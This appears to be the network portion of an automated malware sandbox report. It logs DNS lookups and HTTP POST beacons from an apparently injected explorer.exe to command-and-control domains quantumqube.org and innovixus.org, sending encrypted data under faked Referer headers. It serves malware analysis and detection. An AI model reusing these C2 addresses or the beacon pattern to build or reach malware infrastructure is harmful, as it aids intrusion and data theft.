Oct 6, 2024 21:28:16.582241058 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582263947 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582283974 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582292080 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582302094 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582329988 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582345009 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582370043 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582434893 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582443953 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582470894 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582487106 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582492113 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582523108 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582531929 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582531929 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582565069 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582576036 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582612991 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582648039 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582686901 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582707882 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582716942 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582725048 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582741022 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582766056 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582803011 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582813025 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582845926 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582925081 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582958937 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.582961082 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.582971096 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583003998 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583022118 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583048105 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583066940 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583091021 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583092928 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583134890 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583184958 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583194017 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583229065 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583281040 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583291054 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583304882 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583312988 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583317995 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583359003 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583431005 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583466053 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583539009 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583580971 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583586931 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583607912 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583626032 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583645105 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583683014 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583690882 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583700895 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583719969 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583734035 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583755016 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583774090 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583796978 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583805084 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583816051 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583823919 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583838940 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583868027 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.583919048 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.583956957 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.619584084 CEST  80     49748  194.87.189.87  192.168.2.8
Oct 6, 2024 21:28:16.620740891 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.620822906 CEST  49748  80     192.168.2.8    194.87.189.87
Oct 6, 2024 21:28:16.620872021 CEST  49748  80     192.168.2.8    194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.620924950 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.620970011 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621017933 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621068001 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621120930 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621166945 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621225119 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621278048 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621336937 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621396065 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621448994 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621515036 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621567011 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621624947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621685028 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621733904 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621803045 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621851921 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621905088 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621922970 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.625751972 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.625842094 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.667587042 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.669003963 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669091940 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669151068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669203997 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669243097 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669295073 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669336081 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669389009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669437885 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669493914 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669547081 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669599056 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669645071 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669701099 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669751883 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669817924 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669868946 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669935942 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669984102 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670042038 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670100927 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670164108 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670178890 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.715531111 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.715770960 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.719196081 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.720995903 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.721029997 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.721084118 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721131086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.721308947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721472025 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721532106 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721581936 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721651077 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721682072 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.771766901 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.771847963 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.782949924 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.783147097 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783237934 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783317089 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783396006 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783459902 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.835536003 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.835591078 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869379997 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.869529009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869609118 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869661093 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869714975 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869751930 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.874815941 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.874954939 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875027895 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875080109 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875157118 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875185966 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.919513941 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.919621944 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923001051 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.923218012 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.923331976 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923413038 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923475981 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923538923 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923593998 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923655033 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923702002 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923748970 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923804998 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923868895 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923918009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.928421974 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.928740025 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.928821087 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.928859949 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.975528955 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.981158018 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.990704060 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.990786076 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.990886927 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991247892 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991302013 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991348982 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991415024 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991477966 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991542101 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991592884 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991652012 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991700888 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991754055 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991770029 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996084929 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.996215105 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996310949 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996365070 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996411085 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996464968 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996514082 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996581078 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996633053 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996690035 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.043617010 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.043682098 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076380968 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.076469898 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.076595068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076729059 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076806068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076824903 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.076894999 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076962948 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.077043056 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.077111006 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.077203989 CEST4974880192.168.2.8194.87.189.87
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 6, 2024 21:26:30.189364910 CEST | 56206 | 53 | 192.168.2.8 | 1.1.1.1
Oct 6, 2024 21:26:30.205813885 CEST | 53 | 56206 | 1.1.1.1 | 192.168.2.8
Oct 6, 2024 21:26:30.272406101 CEST | 55116 | 53 | 192.168.2.8 | 1.1.1.1
Oct 6, 2024 21:26:30.536979914 CEST | 53 | 55116 | 1.1.1.1 | 192.168.2.8
Oct 6, 2024 21:27:35.834398985 CEST | 52405 | 53 | 192.168.2.8 | 1.1.1.1
Oct 6, 2024 21:27:36.068567991 CEST | 53 | 52405 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 6, 2024 21:26:30.189364910 CEST | 192.168.2.8 | 1.1.1.1 | 0x6dcb | Standard query (0) | quantumqube.org | A (IP address) | IN (0x0001) | false
Oct 6, 2024 21:26:30.272406101 CEST | 192.168.2.8 | 1.1.1.1 | 0xa26f | Standard query (0) | innovixus.org | A (IP address) | IN (0x0001) | false
Oct 6, 2024 21:27:35.834398985 CEST | 192.168.2.8 | 1.1.1.1 | 0x89b9 | Standard query (0) | innovixus.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 6, 2024 21:26:30.205813885 CEST | 1.1.1.1 | 192.168.2.8 | 0x6dcb | No error (0) | quantumqube.org | (none) | 194.87.189.87 | A (IP address) | IN (0x0001) | false
Oct 6, 2024 21:26:30.536979914 CEST | 1.1.1.1 | 192.168.2.8 | 0xa26f | No error (0) | innovixus.org | (none) | 198.54.117.242 | A (IP address) | IN (0x0001) | false
Oct 6, 2024 21:27:36.068567991 CEST | 1.1.1.1 | 192.168.2.8 | 0x89b9 | No error (0) | innovixus.org | (none) | 198.54.117.242 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:26:30.211853981 CEST | 283 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://upgyyhdoyghspm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 111
Host: quantumqube.org
Oct 6, 2024 21:26:30.211853981 CEST | 111 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 37 90 e9 35
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{75B}w{`r`[O:=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49718 | 198.54.117.242 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:26:30.543196917 CEST | 281 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://smuegklsriebfq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: innovixus.org
Oct 6, 2024 21:26:30.543196917 CEST | 233 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 08 94 e9 16
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{\zbLkn82/aV6)Ea6g[93X'$yS`w!ytRO*,"<`%K0KP{Qn0`-'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49730 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:27:35.783380985 CEST | 285 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://drfkgcucoqvlrnnc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 257
Host: quantumqube.org
Oct 6, 2024 21:27:35.783402920 CEST | 257 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 54 b9 e7 37
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{T7}|-6EG=E3LPHqiJIq'3&d-C*uTUUas|FR"OR#"]!Y~2ot;wE%B%*rr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49734 | 198.54.117.242 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:27:36.074981928 CEST | 283 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://thbqljycmivxnpmr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 148
Host: innovixus.org
Oct 6, 2024 21:27:36.075068951 CEST | 148 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 27 87 90 71
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{'q9a$_}q&U1sYw+31hH}6M^
Oct 6, 2024 21:27:36.642191887 CEST | 345 | IN | HTTP/1.1 403 Forbidden
Date: Sun, 06 Oct 2024 19:27:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: namecheap-nginx
Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49738 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:27:36.712831020 CEST | 283 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rdycpqjqlugnms.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 114
Host: quantumqube.org
Oct 6, 2024 21:27:36.712853909 CEST | 114 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 27 c2 80 01
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{'.$GC8PJeZDy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49742 | 198.54.117.242 | 80 | 4084 | C:\Windows\explorer.exe

